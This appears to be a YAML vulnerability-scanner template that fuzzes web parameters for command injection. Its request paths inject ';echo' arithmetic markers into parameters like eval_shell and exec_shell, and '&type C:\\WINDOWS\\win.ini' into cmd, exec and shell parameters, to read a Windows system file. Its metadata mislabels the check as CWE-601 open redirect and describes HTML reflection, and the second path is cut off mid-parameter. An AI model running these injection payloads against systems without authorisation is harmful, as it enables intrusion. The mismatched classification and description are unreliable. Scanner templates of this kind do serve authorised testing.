http:
- matchers:
  - status:
    - 200
    type: status
  - type: word
    words:
    - '[mci extensions]'
    - ADD-CMD100GAURAVGAURAV
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}?assert_code=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&assert_eval=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&assert_php=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&assert_template=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&eval_shell=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&exec_shell=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV&shell_eval=%3Becho%20ADD-CMD%24%28%2880%2B20%29%29%24%28echo%20GAURAV%29GAURAV'
  - '{{BaseURL}}?cmd=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&command=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&exec=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&execute=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&payload=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&code=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&shell=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&s'
id: 6rcepost-26
info:
  author: erickfernandox
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 6rcepost
  severity: medium
  tags: fuzzer, generic
